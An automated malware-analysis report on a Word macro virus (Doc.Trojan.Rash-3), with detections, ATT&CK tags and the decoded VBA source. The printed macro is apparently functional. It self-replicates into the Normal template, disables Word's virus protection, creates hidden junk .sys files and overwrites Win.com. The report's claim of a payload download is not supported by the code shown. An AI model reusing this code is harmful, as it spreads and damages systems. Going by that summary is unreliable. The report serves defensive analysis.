Verdict: MALICIOUS (Risk Score: 120)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon file opening. The ClamAV detection 'Doc.Trojan.Rash-3' further confirms its malicious nature. The VBA code appears to be obfuscated and truncated, but the presence of the Document_Open macro strongly suggests an attempt to download and execute a secondary payload.
Heuristics (3)
- ClamAV: Doc.Trojan.Rash-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Rash-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9889 bytes | 69668009032b81f4749a15b4e48df06819cbbce2b6105f986f1441cc56738fba |
Preview of the extracted script (first 1,000 lines):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Shock()
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rem + Danil Igorev's Virus Laboratory, city of Pit-Santerburg 1999+
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Document_Close
End Sub

Private Sub Porcher()
Dim bas(190)
Namer = "ПорчаДеГенератор"
Rem ++++++++++++++++++++++++++
Rem ++ +++++ +++++++ ++++
Rem ++ +++++ ++++ +++++++ ++++
Rem ++ +++++ ++++ +++++++ ++++
Rem ++ +++++ ++++ +++++++ ++++++++
Rem ++ +++++ +++++++ ++++++++++++
Rem ++ ++++ +++++ +++++++ ++++++++++++++
Rem ++ +++++ +++++ ++++++++++++
Rem +++++++++++++++++++++++++++++
bo1 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bo2 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
KK = 0
If bo1 <> "Private Sub Shock()" Then
    Set bst = NormalTemplate.VBProject.VBComponents.Item(1)
    KK = 1
End If
If bo2 <> "Private Sub Shock()" Then
    Set bst = ActiveDocument.VBProject.VBComponents.Item(1)
    KK = 1
End If
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
If KK > 0 Then
    Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    bol = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    For bi = 1 To bol
        bas(bi) = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(bi, 1)
    Next bi
    Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    For bi = 1 To bol
        bst.CodeModule.InsertLines bi, bas(bi)
    Next bi
    Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
End If
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Negr = "KilleRRRRRash"
For bi = 1 To 40
    bnam = "c:\"
    For bj = 1 To 6
        bkk = Int(10 * Rnd) + 1
        bnam = bnam + Mid(Negr, bkk, 1)
    Next bj
    Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    bnam = bnam + ".sys"
    Open bnam For Output As #1
    Seek #1, 65535 * 8
    Print #1, "Чтобы помнили... FOREVER!!!"
    Close #1
    SetAttr bnam, 6
    Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Next bi
Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Name "c:\Windows\Command\edit.com" As "C:\Windows\Win.com"
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
End Sub

Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Private Sub Document_Open()
Shock
End Sub

Private Sub Document_Close()
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
daa = Date
Porcher
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
End Sub

' Processing file: /opt/analyzer/scan_staging/2f425820287f4a7bbd3b15eeef653e6d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10670 bytes
' Line #0:
'   FuncDefn (Private Sub Shock())
' Line #1:
'   Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #2:
'   Rem 0x0040 " + Вирусная лаборатория Данила Игорева г.Пит-Сантербург 1999+"
' Line #3:
'   Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #4:
'   ArgsCall Document_Close 0x0000
' Line #5:
'   EndSub
' Line #6:
'   FuncDefn (Private Sub Porcher())
' Line #7:
'   Dim
'   OptionBase
'   LitDI2 0x00BE
'   VarDefn bas
' Line #8:
'   LitStr 0x0010 "ПорчаДеГенератор"
'   St Namer
' Line #9:
'   Rem 0x001B " ++++++++++++++++++++++++++"
' Line #10:
'   Rem 0x001B " ++ +++++ +++++++ ++++"
' Line #11:
'   Rem 0x001B " ... (truncated)
```